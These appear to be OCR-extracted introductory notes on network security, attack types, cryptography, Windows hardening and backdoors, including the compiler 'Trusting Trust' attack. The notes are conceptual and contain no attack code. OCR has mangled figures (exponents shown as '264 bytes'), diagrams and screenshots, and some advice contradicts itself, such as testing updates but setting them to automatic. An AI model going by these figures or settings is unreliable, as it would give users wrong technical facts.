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1. Fundamentals of Network Security 
Types of Security 

■ Computer Security - generic name for the collection of tools designed to 
protect data and to thwart hackers 

■ Network Security - measures to protect data during their transmission 

■ Internet Security - measures to protect data during their transmission 
over a collection of interconnected networks 

Terminology 

■ Access control - ability to permit or deny the use 
of an object by a subject. 

■ It provides 3 essential services: 

- Identification and authentication (who can login) 

- Authorization (what authorized users can do) 

- Accountability (identifies what a user did) 


Non-Repudiation 


■ A property of a cryptographic system that 
prevents a sender from denying later that he or 
she sent a message or performed a certain 
action. 

Audit 

A chronological record of system activities that is 
sufficient to enable the reconstruction and 


Vulnerability 

■ A weakness in security procedures, network 
design, or implementation that can be exploited 
to violate a corporate security policy 

- Software bugs 

- Configuration mistakes 

- Network design flaw 

■ Exploit 

- Taking advantage of a vulnerability. 

Risk 

■ The possibility that a particular vulnerability will 
be exploited 

- Risk analysis: the process of identifying: 

Security risks 

Determining their impact 

And identifying areas require protection 

Threat 

■ Any circumstance or event with the potential to 
cause harm to a networked system 

- Denial of service 

Attacks make computer resources (e.g., bandwidth, disk 



space, or CPU time) unavailable to its intended users 

- Unauthorised access 

Access without permission issues by a rightful owner of 
devices or networks 

- Impersonation 

- Worms 

- Viruses 


Attack sources 

■ Active vs. Passive 

- Active = Writing data to the network 

Common to disguise one’s address and conceal the identity 
of the traffic sender. 

- Passive = Reading data on the network 
Purpose = breach of confidentiality 

Attackers gain control of a host in the communication path 
between two victim machines 

Attackers has compromised the routing infrastructure to 
arrange the traffic pass through a compromised machine. 

What are security aims? 

■ Controlling data / network access 

■ Preventing intrusions 

■ Responding to incidences 

■ Ensuring network availability 

■ Protecting information in transit 



Security services 

■ Authentication 

■ Authorisation 

■ Access control 

■ Data integrity 

■ Data confidentiality 
■ Auditing / logging 

■ DoS mitigation 


Attacks 

■ ARP Spoofing 

■ MAC attacks 

■ DHCP attacks 

■ VLAN hopping 

Routing Attacks 

■ Attempt to poison the routing information 

■ Distance Vector Routing 

- Announce 0 distance to all other nodes 
Blackhole traffic 

Eavesdrop 

■ Link State Routing 

- Can drop links randomly 

- Can claim direct link to any other routers 

- A bit harder to attack than DV 

■ BGP attacks 

- ASes can announce arbitrary prefix 

- ASes can alter path 


Application Layer Attacks 



■ Scripting vulnerabilities 

■ Cookie poisoning 

■ Buffer overflow 

■ Hidden field manipulation 

■ Parameter tampering 

■ Cross-site scripting 

■ SQL injection 


Common Types of Attack 

■ Man-in-the-middle attack - intercepts messages 
that are intended for a valid device 

■ Ping sweeps and port scans 

■ Hijacking and Spoofing -sets up a fake device 
and trick others to send messages to it 

■ Sniffing - capture packet as they travel through 
the network 

■ DoS and DDoS 

Wireless Attacks 

■ WEP - first security mechanism for 802.1 1 
wireless networks 

■ Weaknesses in this protocol were discovered by 
Fluhrer, Mantin and Shamir, whose attacks 
became known as “FMS attacks” 

■ Tools were developed to automate WEP 
cracking 



■ Chopping attack were released to crack WEP 
more effectively and faster 

Man in the Middle Attacks (Wireless) 

■ Creates a fake access point and have clients 
authenticate to it instead of a legitimate one. 

■ Capture traffic to see usernames, passwords, 
etc that are sent in clear text. 


What is Cryptography? 

■ Part of a field of study known as cryptology 

■ Cryptology includes: 

- Cryptography 

Study of methods for secret writing 
Transforming messages into unintelligible form 
Recovering messages using some secret knowledge (key) 

- Cryptanalysis 

Analysis of cryptographic systems, inputs and outputs 
To derive confidential information 

Cryptography 

■ Encryption - process of transforming plaintext to 
ciphertext using a cryptographic key 

■ Symmetric key cryptography - uses a single key 
to both encrypt and decrypt information. Also 
known as private key. 

- Includes DES, 3DES, AES, IDEA, RC5, Blowfish 

■ Asymmetric key cryptography - separate keys 


for encryption and decryption (public and private 

Terminology of cryptography 

■ Cipher 

- Cryptographic technique (algorithm) applying a secret transformation to 
messages 

■ Plaintext / cleartext 

- Original message or data 


■ Encryption 

- Transforming plaintext, using a secret key, so meaning is concealed 

■ Ciphertext 

- Unintelligible encrypted plaintext 

■ Decryption 

- Transforming ciphertext back into original plaintext 

■ Cryptographic Key 

- Secret knowledge used by cipher to encrypt or decrypt message 

Cryptography 

■ Digital Signature - sender encrypts message 
with own private key instead of encrypting with 
intended receiver’s public key 

■ Message digests - produces a condensed 
representation of a message (hashing) 

- MD5 

- SHA-1 

- HMAC 

DES 

■ Data Encryption Standard 


■ Developed by IBM for the US government in 
1973-1974, and approved in Nov 1976. 

■ Based on Horst Feistel’s Lucifer cipher 

■ block cipher using shared key encryption, 56-bit 
key length 

■ Block size: 64 bits 


Secret Key Encryption 

Shared Secret Key Shared Secret Key 

Sensitive Sensitive 

Information — ENCRYPT — INTERNET — DECRYPT — Information 
(Cleartext) (Cleartext) 

(Ciphertext) 

Hashing 

■ Also called a digest or checksum 

■ A form of signature that represents the data. 

■ Uses: 

- Verifying file integrity - if the hash changes, it means 
the data is either compromised or altered in transit. 

- Digitally signing documents 

- Hashing passwords 


MD5 Message Digest Algorithm 


- Outputs a 128-bit fingerprint of an arbitrary-length 
input 

■ SHA-1 (Secure Hash Algorithm) 

- Outputs a 160-bit message digest similar to MD5 

- Widely-used on security applications (TLS, SSL, 
PGP, SSH, S/MIME, IPsec) 


2. Ethical Hacking VS Non Ethical Hacking 
What is ethical hacking ? 

As the name suggests , something legal is associated with it. Many organizations , today computer are hacked for 

the good purpose of the organizations . in organizations , to hack computer means vulnerability that is loop holes in a 
computer found by them they build bye firewall . considering a very simple examination here , the windows security a n 
organization upgrade on the daily basis . it is usual act to hack and it is always parior to the release of new softwares to 
test it ability to with understand such attack . 


What is non ethical hacking ? 

This is serious issue and also a hottest topic among today's youth . beacause every user almost is facing this kind of 
problem . it mean , that when people , steal someone data just for there own personal gain . it inclouds mostly , credit 
card info , ID theft and the make perfect sence to me . However , primarily it means that hackingjust to do demeg to 
someone or something is foreignto me . I do not and will not ever understand how someone can get persanol satisfaction 


from watching others suffers . While I feel this way I will also say that unethical hacking is far more interesting for me to 
read about . Among this the malicious hacker is to be considered which black hat hacker is . 


3 Types Of Hacker - — 

1. Black Hat Hacker ( Real Hacker ) 

2. White Hat Hacker ( Ethical Hacker ) 

3. Gray Hat Hacker 


3. Type of Security Threats 


Introduction 

Computer technology is more and more ubiquitous; the penetration of computer in society is a welcome step towards 
modernization but society needs to be better equipped to grapple with challenges associated with technology. New hacking 
techniques are used to penetrate in the network and the security vulnerabilities which are not often discovered create 
difficulty for the security professionals in order to catch hackers. The difficulties of staying up to date with security issues 
within the realm of IT education are due to the lack of current information. The recent research is focused on bringing 
quality security training combined with rapidly changing technology. Online networking security is to provide a solid 



understanding of the main issues related to security in modern networked computer systems. This covers underlying 
concepts and foundations of computer security, basic knowledge about security-relevant decisions in designing IT 
infrastructures, techniques to secure complex systems and practical skills in managing a range of systems, from personal 
laptop to large-scale infrastructures. 


Definition 

According to the UK Government, Information security is: "the practice of ensuring information is only read, heard, 
changed, broadcast and otherwise used by people who have the right to do so" 

Why is Necessary Computer Security? 

Computer security is the process of preventing and detecting unauthorized use of your computer. Prevention measures help 
you to stop unauthorized users from accessing any part of your computer system. Detection helps you to determine whether 
or not someone attempted to break into your system, if they were successful, and what they may have done. 

Virus Threats 

Threat, a computer virus is a program written to alter the way a computer operates, without the permission or knowledge of 
the user. A virus replicates and executes itself, usually doing damage to your computer in the process. 

Spyware Threats 


A serious computer security threat, spyware is any program that monitors your online activities or installs programs without 
your consent for profit or to capture personal information. We’ve amassed a wealth of knowledge that will help you combat 
spyware threats and stay safe online. 



Hackers 


People, not computers, create computer security threats and malware. Hackers are programmers who victimize others for 
their own gain by breaking into computer systems to steal, change or destroy information as a form of cyber-terrorism. 
What scams are they using lately? Learn how to combat dangerous malware and stay safe online. 


Phishing Threats 

Masquerading as a trustworthy person or business, phishers attempt to steal sensitive financial or personal information 
through fraudulent email or instant messages. Internet Based Attacks While your computer is connected to the Internet it 
can be subject to attack through your network communications. Some of the most common attacks include: 

□ Bonk - An attack on the Microsoft TCP/IP stack that can crash the attacked computer. 

□ RDS_Shell - A method of exploiting the Remote Data Services component of the Microsoft Data Access Components 
that lets a remote attacker run commands with system privileges. 

□ Win Nuke - An exploit that can use NetBIOS to crash older Windows computers. 

Viral Web Sites 

Users can be enticed, often by email messages, to visit web sites that contain viruses or Trojans. These sites are known as 
viral web sites and are often made to look like well known web sites and can have similar web addresses to the sites they 
are imitating. Users who visit these sites often inadvertently download and run a virus or Trojan and can then become 
infected or the subject of hacker attacks. 


Spyware, Adware and Advertising Trojans 



Spyware, Adware and Advertising Trojans are often installed with other programs, usually without your knowledge. They 
record your behaviors on the Internet, display targeted ads to you and can even download other malicious software on to 
your computer. They are often included within programs that you can download free from the 


Internet or that are on CDs given away free by magazines. Spyware doesn’t usually carry viruses but it can use your system 
resources and slow down your Internet connection with the display of ads. If the Spyware contains bugs (faults) it can make 
your computer unstable but the main concern is your privacy. These programs record every stepthat you take on the Internet 
and forward it to an Ad Management Centre which reviews your searches and downloads to determine your shopping 
preferences. The Ad Management Centre will build up a detailed profile of you, without your knowledge, and can pass this 
on to third parties, again without your knowledge. Some Spyware can download more serious threats on to your computer, 
such as Trojan Horses. 


Social Engineering 

Tricking computer users into revealing computer security or private information, e.g. passwords, email addresses, etc, by 
exploiting the natural tendency of a person to trust and/or by exploiting a person's emotional response. 

How to Secure the System 

There are basic three methods to secure the system from online security attack. 

□ Prevention: If you were to secure your house, prevention would be similar to placing dead bolt locks on your doors, 
locking your window, and perhaps installing a chain link fence around your yard. You are doing everything possible to 
keep the threat out. 



□ Detection: You want to be sure you detect when such failures happen. Once again using the house analogy, this would 
be si mi lar to putting a burglar alarm and motion sensors in the house. These alarms go off when someone breaks in. If 
prevention fails, you want to be alerted to that as soon as possible. 


□ Reaction: Detecting the failure has little value if you do not have the ability to respond. What good does it to be alerted 
to a burglar if nothing is done? If someone breaks into your house and triggers the burglar alarm, one hopes that the local 
police force can quickly respond. The same holds true for information security. Once you have detected a failure, you must 
execute an effective response to the incident. 


Tips for securing the system attack 

□ Install and Use Anti-Virus Programs 

□ Use Care When Reading Email with Attachments 

□ Install and Use a Firewall Program 

□ Make Backups of Important Files and Folders 

□ Use Strong Passwords 

□ Use Care When Downloading and Installing Programs 

□ Install and Use a Hardware Firewall 

□ Install and Use a File Encryption Program and Access Controls 

□ Safeguard your Data 

□ Real-World Warnings keep you safe online. 

□ Keeping Children Safe Online 


Privacy Control 



□ Protecting Y our Privacy 

□ Effectively Erasing Files 

□ Supplementing Passwords 


Use Safe Browsing 

□ Evaluating Your Web Browser's Security Settings 

□ Shopping Safely Online 

□ Web Site Certificates 

□ Bluetooth Technology 

□ Reviewing End-User License Agreements 


4. Windows Operating System 


History 

The story of Windows begins with a very different operating system, developed by Microsoft for the first IBM 
personal computer and referred to as MS-DOS or PC-DOS. The initial version, DOS 1 .0, was released in 
August 1981. It consisted of 4000 lines of assembly language source code and ran in 8 Kbytes of memory using 
the Intel 8086 microprocessor.When IBM developed a hard disk-based personal computer, the PC XT, Microsoft 
developed DOS 2.0, released in 1983. It contained support for the hard disk and provided for hierarchical 
directories. Heretofore, a disk could contain only one directory of files, supporting a maximum of 64 files. While 
this was adequate in the era of floppy disks, it was too limited for a hard disk, and the single-directory restriction 
was too clumsy. This new release allowed directories to contain subdirectories as well as files. The new release 



also contained a richer set of commands embedded in the operating system to provide functions that had to be 
performed by external programs provided as utilities with release 1 . Among the capabilities added were several 
UNIX-like features, such as I/O redirection, which is the ability to change the input or output 
identity for a given application, and background printing. The memory-resident portion grew to 24 Kbytes. When 
IBM announced the PC AT in 1984, Microsoft introduced DOS 3.0. The AT contained the Intel 80286 


processor, which provided extended addressing and memory protection features. These were not used by DOS. 
To remain compatible with previous releases, the operating system simply used the 80286 as a "fast 8086." The 
operating system did provide support for new keyboard and hard disk peripherals. Even so, the memory 
requirement grew to 36 Kbytes. There were several notable upgrades to the 3.0 release. DOS 3.1 , released in 
1984, contained support for networking of PCs. The size of the resident portion did not change; this -4- was 
achieved by increasing the amount of the operating system that could be swapped. DOS 3.3, released in 1987, 
provided support for the new line of IBM machines, the PS/2. Again, this release did not take advantage of the 
processor capabilities of the PS/2, provided by the 80286 and the 32-bit 80386 chips.The resident portion 
at this stage had grown to a minimum of 46 Kbytes, with more required if certain optional extensions were 
selected. By this time, DOS was being used in an environment far beyond its capabilities. The introduction of the 
80486 and then the Intel Pentium chip provided power and features that simply could not be exploited by the 
simple-minded DOS. Meanwhile, beginning in the early 1980s, Microsoft began development of a graphical user 
interface (GUI) that would be interposed between the user and DOS. Microsoft's intent was to compete with 
Macintosh, whose operating system was unsurpassed for ease of use. By 1990, Microsoft had a version of the 
GUI, known as Windows 3.0, which incorporated some of the user friendly features of Macintosh. However, it 
was still hamstrung by the need to run on top of DOS. 

After an abortive attempt by Microsoft to develop with IBM a next-generation operating 
system, which would exploit the power of the new microprocessors and which would incorporate the ease-of- 
use features of Windows, Microsoft struck out on its own and developed a new operating system from the 
ground up, Windows NT. Windows NT exploits the capabilities of contemporary microprocessors and provides 
multitasking in a single-user or multiple-user 

environment. The first version of Windows NT (3.1) was released in 1993, with the same GUI as Windows 3.1 , 
another Microsoft operating system (the follow-on to Windows 3.0). However, NT 3.1 was a new 32-bit operating 



system with the ability to support older DOS and Windows applications as well as provide OS/2 support. After 

several versions of NT 3.x, Microsoft released NT 4.0. NT 4.0 has essentially the 

same internal architecture as 3.x. The most notable external change is that NT 4.0 provides the same 


user interface as Windows 95. The major architectural change is that several graphics components that ran in 
user mode as part of the Win32 subsystem in 3.x have been moved into -5- 

the Windows NT Executive, which runs in kernel mode. The benefit of this change is to speed up the operation 
of these important functions. The potential drawback is that these graphics functions now have access to low- 
level system services, which could impact the reliability of the operating system. In 2000, Microsoft introduced 
the next major upgrade, now called Windows 2000. Again, the underlying Executive and kernel architecture is 
fundamentally the same as in NT 4.0, but new features have been added. The emphasis in Windows 2000 is the 
addition of services and functions to support distributed processing. The central element of Windows 2000's new 
features is Active Directory, which is a distributed directory service able to map names of arbitrary objects to any 
kind of information about those objects. 

One final general point to make about Windows 2000 is the distinction between Windows 2000 Server and 
Windows 2000 desktop. In essence, the kernel and executive architecture and services remain the same, but 
Server includes some services required to use as a network server. In 2001 , the latest desktop version of 
Windows was released, known as Windows XP. Both home PC and business workstation versions of XP are 
offered. Also in 2001 , a 64-bit version of XP was introduced. In 2003, Microsoft introduced a new server version, 
known as Windows Server 2003; both 32-bit and 64 bit versions are available. The 64-bit versions of XP and 
Server 2003 are designed specifically for the 64-bit Intel Itanium hardware. 


NTFS Volume and File Structure 

NTFS makes use of the following disk storage concepts: 



• Sector: The smallest physical storage unit on the disk. The data size in bytes is a power of 2 and is almost 
always 512 bytes. 


• Cluster: One or more contiguous (next to each other on the same track) sectors. The cluster size in sectors 
is a power of 2. 

• Volume: A logical partition on a disk, consisting of one or more clusters and used by a filesystem to allocate 
space. At any time, a volume consists of a file system information, a collection of files, and any additional 
unallocated space remaining on the volume that can be allocated to files. A volume can be all or a portion of a 
single disk or it can extend across multiple disks. If hardware or software RAID 5 is employed, a volume 
consists of stripes spanning multiple disks. The maximum volume size for NTFS is 264 bytes. 

The cluster is the fundamental unit of allocation in NTFS, which does not recognize 
sectors. For example, suppose each sector is 512 bytes and the system is configured with two sectors per 
cluster (one cluster = 1 K bytes). If a user creates a file of 1 600 bytes, two clusters are allocated to the file. Later, 
if the user updates the file to 3200 bytes, another two clusters are allocated. The clusters allocated to a file need 
not be contiguous; it is permissible to fragment a file on the disk. Currently, the maximum file size supported by 
NTFS is 232 clusters, which is equivalent to a maximum of 248 bytes. A cluster can have at most 216 bytes. 

The use of clusters for allocation makes NTFS independent of physical sector size. This enables NTFS to 
support easily nonstandard disks that do not have a 512-byte sector size and to support efficiently very large 
disks and very large files by using a larger cluster size. The efficiency comes from the fact that the file system 
must keep track of each cluster allocated to each file; with larger clusters, there are fewer items to manage. 


Windows NTFS Partition and Cluster Sizes 


Volume Size Sectors per Cluster Cluster Size 



512 Mbyte 

512 Mbyte - 1 Gbyte 


1 

2 IK 


512 bytes 


1 Gbyte - 2 Gbyte4 2K 

2 Gbyte - 4 Gbyte 8 4K 

4 Gbyte - 8 Gbytel 6 8K 

8 Gbyte- 16Gbyte32 16K 
16 Gbyte- 32 Gbyte 64 32K 

>32 Gbyte 128 64K 


NTFS Volume Layout 


NTFS uses a remarkably simple but powerful approach to organizing information on a disk volume. Every 
element on a volume is a file, and every file consists of a collection of attributes. Even the data contents of a file 
is treated as an attribute. With this simple structure, a few general-purpose functions suffice to organize and 
manage a file system, few sectors on any volume are occupied by the partition boot sector (although it is 
called a sector, it can be up to 16 sectors long), which contains information about the volume layout and the file 
system structures as well as boot startup information and code. This is followed by the master file table (MFT), 
which contains information about all of the files and folders (directories) on this NTFS volume as well as 
information about available unallocated space. In essence, the MFT is a list of all contents on this NTFS volume, 
organized as a set of rows in a relational database structure. Following the MFT is a region, typically about 1 
Mbyte in length, containingsystem files. Among the files in this region are the following: 

• MFT2: A mirror of the first three rows of the MFT, used to guarantee access to the MFT in 
the case of a single-sector failure 

• Log file: A list of transaction steps used for NTFS recoverability 



Cluster bit map: A representation of the volume, showing which clusters are in use 


• Attribute definition table: Defines the attribute types supported on this volume and 

indicates whether they can be indexed and whether they can be recovered during a system recovery operation. 

Master File Table 

The heart of the Windows file system is the MFT. The MFT is organized as a table of 
variable-length rows, called records. Each row describes a file or a folder on this volume, 


5. Windows Security 


History of Windows Versions 

Microsoft Windows 

family tree 


1.0 2.0 3.0 


95 


98 ME 


r Server only 


2. lx 


3. lx 


98SE 



Standard Edition 
Enterprise Ed»1ion 
Datacenter Edition 



Standard Edition 
Enterprise Edition 
Datacenter Edition 


Server Server Server 


2003 R2 2008 2008 R2 


i— NT kernel-based 


Professional 

Server 



985 1987 1989 1991 1993 1995 1997 1999 2001 2003 2005 2007 2009 

1986 1988 1990 1992 1994 1996 1998 2000 2002 2004 2006 2008 2010 


Control Panel 


The control panel is where system changes and configurations can be made for the Windows operating system. 

Click Start -> Control Panel 


Pick a category 



Appearance and Themes 

& 

Printers and Other Hardware 

fijB™ Network and Internet Connections 


User Accounts 

Add or Remove Programs 


Date, Time, Language, and Regional 
Options 

\<»A Sounds, Speech, and Audio Devices 


Accessibility Options 

Performance and Maintenance 

0 

Security Center 


Security Center 

Windows Security Center can help enhance your computer's security by checking the status of several security essentials 
on your computer, including firewall settings, Windows automatic updating, anti-malware software settings, Internet 
security settings, and User Account Control settings. 


Click Start -> Control 


Panel -> Security Center 

Security essentials 

Security Center helps you manage your Windows security settings. To help protect your computer, 
make sure the three security essentials are marked ON. If the settings are not ON, follow the 
recommendations. To return to the Security Center later, open Control Panel. 

What's new in Windows to help protect mv computer? 


Firewall C ON 

5? 

^ Automatic Updates O CHECK SETTINGS 


^ Virus Protection 

O NOT FOUND 



V 


Manage security settings for: 



Internet Options 
Windows Firewall 



Automatic Updates 


Local Firewall - General Tab 


.Firewalls are designed to prevent unauthorized access to a system. They can be implemented via hardware or software. 
.A firewall is essential to security and should always be turned 'on'. These settings are under the 'Exceptions' tab 

.Click Start -> Control Panel -> Security Center -> Windows Firewall 




Local Firewall - Exceptions Tab 

.The Exceptions tab 


.Allow unsolicited requests to connect to a program on your computer 



.Be more specific about where the request is allowed to initiate from 

.Select Display a notification when Windows Firewall blocks a program to be notified 


Automatic Updates 

. Because updates should be tested before applied, always set 'Automatic' for Automatic Update settings . 






Performance and Maintenance 


. Administrative Tools is where you define your policies and monitor system activity. 

. Click Start -> Control Panel -> Performance and Maintenance -> Administrative Tools 






^ Sounds, Speech, and Audio Devices 


Accessibility Options 

Performance and Maintenance 

0 

Security Center 

or pick a Control 

Panel icon 

Administrative Tools £ Power Options 

** J •' Scheduled Tasks System 



6. Windows Security Process 


Define a strong password policy 


Enforce password history - set to "5". A user cannot use the same password when their password expires. 


Maximum password age - default is "42". This specifies how long a user can use the same password. After 42 days, the 
user must change his/her password. Set to "90" for user accounts and "30" for administrator. 

Minimum password length - set to "8". This means that a password must be at least 8 characters long. 

Password must meet complexity requirements - set to "Enabled". This means a password must include upper and lower 
case letters, a number and a special character. 

Store password using reversible encryption for all users in the domain - always leave "Disabled". If you enable this 
policy, all users' passwords will be easy to crack 


Define an account lockout policy 

These policy settings help you to prevent attackers from guessing users' passwords, and they decrease the likelihood of 
successful attacks on your network. 

Account lockout duration - the number of minutes a locked-out account remains locked out before automatically 
becoming unlocked 

Account lockout threshold - the number of failed logon attempts that causes a user account to be locked out 

Reset account lockout counter after - the number of minutes that must elapse before the failed logon attempt counter is 
reset to 0 Be careful not to set these too low. If users lock themselves out because of mistyping their passwords, this can 
provide for more work for your organization. 



Directory service access - enable to track accesses to an Active Directory® directory service object that has its own 
system access control list (SACL) 

Logon events - enable to see when someone has logged on or off to the computer 
Privilege use - enable to see when someone performs a user right 

Policy change - enable to see attempts to change local security policies, user rights assignments, auditing policies, or trust 
policies 

System events - enable to see when someone has shut down or restarted the computer, or when a process or program 
tries to do something it does not have permission to do . 


Security Setting 

Success - setting generates an event when the requested action succeeds 
Failure - setting generates an event when the requested action fails 
No Auditing - does not generate an event for the associated action 


Policy 

Security Setting 

L?o| Audit account logon events 

Success, Failure 

-■■2] Audit account management 

Success, Failure 

no] Audit directory service access 

No auditing 

So] Audit logon events 

Success, Failure 

So] Audit object access 

No auditing 

L?o] Audit policy change 

Success, Failure 

So] Audit privilege use 

Failure 

[So] Audit process tracking 

Failure 

hri Audit system events 

Failure 


Event Viewer 


. Click Start -> Control Panel -> Performance and Maintenance -> Administrative Tools -> Event Viewer 
. Displays logs that capture events occurring on the system 

.These logs are based on the policies you have created and/or enabled (local security policy, audit policies, etc.) 
. Logs sources for use by the Windows operating system and Windows applications respectively 
. Three log sources: System, Application and Security 

. Application log - events logged by programs 
. Security log - any successful or unsuccessful logon attempts 

. System log - events logged by system components ( i.e., driver fails to load during startup) 


Services 


. To view all available services 

. Click Start -> Control Panel -> Performance and Maintenance -> Administrative Tools -> Services 


Disable unnecessary services 

1. Turning off unnecessary services can greatly reduce your exploit risk, while improving system performance 

2. IIS - web server capabilities 

3. NetMeeting Remote Desktop Sharing - VoIP 


4. Remote Desktop Help Session Manager 

5. Remote Registry - allows remote users to edit registry 

6. Routing and Remote Access - allows the system to be used as a router 

7. Simple File Sharing 

8. SSDP Discovery Service - plug and play 

9. Telnet - allows remote users to log on 

10. Universal Plug and Play Device Host - installation of plug and play devices 

11. Windows Messenger Service - not necessary to use windows instant messenger; allows 'netsend' command to be 
used. 


The Processes Tab 

. Shows all processes running; also shows the owner , CPU usage and Memory Usage of each process 
. Allows you to sort processes based on name, user, cpu or memory usage 


. Right Click on the Menu Bar -> Click Task Manager -> Processes Tab 



Windows Task Manager 


File Options View Shut Down Help 


Applications 

Processes 

Performance 

Networking 

Users 


Image Name 

User Name 

CPU 

Mem Usage A 

taskmgr.exe 

student 

08 

4,208 K 

alg.exe 

LOCAL SERVICE 

00 

3,212 K 

msimn.exe 

student 

00 

14,504 K 

IEXPLORE.EXE 

student 

02 

24, 192 K 

spoolsv.exe 

SYSTEM 

00 

4,100 K 

svchost.exe 

LOCAL SERVICE 

00 

4,176 K 

msmsgs.exe 

student 

00 

1,488 K 

svchost.exe 

NETWORK SERVICE 

00 

3,012 K 

svchost.exe 

SYSTEM 

00 

16,964 K 

svchost.exe 

NETWORK SERVICE 

00 

3,808 K 

svchost.exe 

SYSTEM 

00 

4,424 K 

lsass.exe 

SYSTEM 

00 

1,624 K 

services.exe 

SYSTEM 

00 

3,748 K 

winlogon.exe 

SYSTEM 

00 

1,340 K 

csrss.exe 

SYSTEM 

00 

3,368 K 

explorer.exe 

student 

02 

14,548 K 

smss.exe 

SYSTEM 

00 

388 K 

wscntfy.exe 

student 

00 

1,788 K 

SvsfRm 

SVSTFM 

on 

236 K 

Q] Show processes 

from all users 


End Process 



Processes: 20 

CPU Usage: 12% 

Commit Charge: 108M / 2460M 


User Accounts 

. Local Users and Groups limit the ability of users and groups to perform certain actions by assigning them rights and 
permissions 

. User accounts 

. A collection of information that tells Windows what files a user can access, what changes a user can make 
. Allow multiple users to share a computer, but still have their own files and settings 


. Each user accesses their user account with a user name and password 
. Administrator account 

. Can change security settings, install software and hardware, and access all files on the computer; including make 
changes to other user accounts 


User and Group Account Permissions 

. Permissions are customizable by individual user or by a group of users 
Full Control - all file permissions granted (administrator level) 

Modify - permission to change content but not ownership of files; cannot delete files or folders 
Read & Execute - permission allows or denies the user to read and execute files 
List Folder Contents - permission allows or denies the user from viewing file names 
Read - permission allows or denies the user from viewing the attributes of a file or folder 

Write - permission applies only to files and allows or denies the user from making changes to the file and overwriting 
existing content by NTFS 


Local vs. Domain Accounts 
. Local account 

. Username and encrypted password are stored on the computer itself 
. Permissions apply only to this computer 



. Domain account 

. Resides on a Domain Controller 

. A server that manages access to a set of network resources such as print servers, applications, etc. 

. A user can log into the domain controller and is given permissions to all network resources 

. Username and password are stored on a domain controller rather than on each computer the user accesses 
. Permissions apply to a network of computers and peripherals 
. Network administrators only have one place to store user information 


First Steps to Securing a Machine 
Step By Step 

1 . Install the operating system and components (such as hardware drivers, system services, and so on). 

2. Install Service Packs and Windows Updates. 

3. Update installed applications (Adobe Reader, Flash, etc). 

4. Install anti-virus/anti-spyware utilities and scan for malware 

5. Configure critical operating system parameters (such as password policy, access control, audit policy, kernel mode 
driver configuration, and so on). 

6. Take ownership of files that have become inaccessible. 

7. Configure and monitor the security and auditing logs. 



8. When it is clean and secure, back up the system and create a restore point . 


Checklist 

1. Disable unnecessary services 

2. Disable dangerous features 

3. Employ email security practices 

4. Install and maintain malware protection software 

5. Patch more than just the OS 

6. Research and test updates 

7. Use a desktop firewall 

8. Look for alternatives to default applications 

How To Secure Network Hacking 
Step By Step - 

1. Go to run command 

2. Type "control userpasswords2" 

3. Then "Enter" 

4. Advansed 



5. then show me "Require users to press ctrl+alt+delete" did here 

6. Apply 

7. Ok 

7. Backdoor's 

"A backdoor is a method, often secret, of bypassing normal authentication in a product, computer system, cryptosystem 
or algorithm etc. Backdoors are often used for securing unauthorized remote access to a computer, or obtaining access to 
plaintext in cryptographic systems ." 

Overview 

The threat of backdoors surfaced when multiuser and networked operating systems became widely adopted. Petersen 
and Turn discussed computer subversion in a paper published in the proceedings of the 1967 AFIPS Conference. They 
noted a class of active infiltration attacks that use "trapdoor" entry points into the system to bypass security facilities a nd 
permit direct access to data. The use of the word trapdoor here clearly coincides with more recent definitions of a 
backdoor. However, since the advent of public key cryptography the term trapdoor has acquired a different meaning (see 
trapdoor function ), and thus the term "backdoor" is now preferred. More generally, such security breaches were 
discussed at length in a RAND Corporation task force report published under ARPA sponsorship by J.P. Anderson and D.J. 
Edwards in 1970. 

A backdoor in a login system might take the form of a hard coded user and password combination which gives access to the 
system. A famous example of this sort of backdoor was used as a plot device in the 1983 film WarGames , in which the 
architect of the " WOPR " computer system had inserted a hardcoded password (his dead son's name) which gave the user 
access to the system, and to undocumented parts of the system (in particular, a video game-like simulation mode and direct 
interaction with the artificial intelligence) . 


Although the number of backdoors in systems using proprietary software (software whose source code is not publicly 
available) is not widely credited, they are nevertheless frequently exposed. Programmers have even succeeded in secretly 
installing large amounts of benign code as Easter eggs in programs, although such cases may involve official forbearance, if 
not actual permission. 


Type of backdoors 

1. Object code backdoors - Harder to detect backdoors involve modifying object code , rather than source code - object code 
is much harder to inspect, as it is designed to be machine-readable, not human-readable. These backdoors can be inserted 
either directly in the on-disk object code, or inserted at some point during compilation, assembly linking, or loading - in the 
latter case the backdoor never appears on disk, only in memory. Object code backdoors are difficult to detect by inspection 
of the object code, but are easily detected by simply checking for changes (differences), notably in length or in checksum, 
and in some cases can be detected or analyzed by disassembling the object code. Further, object code backdoors can be 
removed (assuming source code is available) by simply recompiling from source. 

Thus for such backdoors to avoid detection, all extant copies of a binary must be subverted, and any validation checksums 
must also be compromised, and source must be unavailable, to prevent recompilation. Alternatively, these other tools 
(length checks, diff, checksumming, disassemblers) can themselves be compromised to conceal the backdoor, for example 
detecting that the subverted binary is being checksummed and returning the expected value, not the actual value. To 
conceal these further subversions, the tools must also conceal the changes in themselves - for example, a subverted 
checksummer must also detect if it is checksumming itself (or other subverted tools) and return false values. This leads to 
extensive changes in the system and tools being needed to conceal a single change. 


Because object code can be regenerated by recompiling (reassembling, relinking) the original source code, making a 
persistent object code backdoor (without modifying source code) requires subverting the compiler itself - so that when it 
detects that it is compiling the program under attack it inserts the backdoor - or alternatively the assembler, linker, or 
loader. As this requires subverting the compiler, this in turn can be fixed by recompiling the compiler, removing the 
backdoor insertion code. This defense can in turn be subverted by putting a source meta-backdoor in the compiler, so that 
when it detects that it is compiling itself it then inserts this meta-backdoor generator, together with the original backdoor 
generator for the original program under attack. After this is done, the source meta-backdoor can be removed, and the 
compiler recompiled from original source with the compromised compiler executable: the backdoor has been bootstrapped. 
This attack dates to Karger & Schell (1974) , and was popularized in Thompson's 1984 article, entitled "Reflections on 
Trusting Trust"; it is hence colloquially known as the "Trusting Trust" attack. See compiler backdoors , below, for details. 
Analogous attacks can target lower levels of the system, such as the operating system, and can be inserted during the 
system booting process; these are also mentioned in Karger & Schell (1974) , and now exist in the form of boot sector 
viruses . 

2. Asymmetric backdoors - 

A traditional backdoor is a symmetric backdoor: anyone that finds the backdoor can in turn use it. The notion of an 
asymmetric backdoor was introduced by Adam Young and Moti Yung in the Proceedings of Advances in Cryptology: 
Crypto '96. An asymmetric backdoor can only be used by the attacker who plants it, even if the full implementation of the 
backdoor becomes public (e.g., via publishing, being discovered and disclosed by reverse engineering , etc.). Also, it is 
computationally intractable to detect the presence of an asymmetric backdoor under black-box queries. This class of attacks 
have been termed kleptography ; they can be carried out in software, hardware (for example, smartcards) , or a combination 
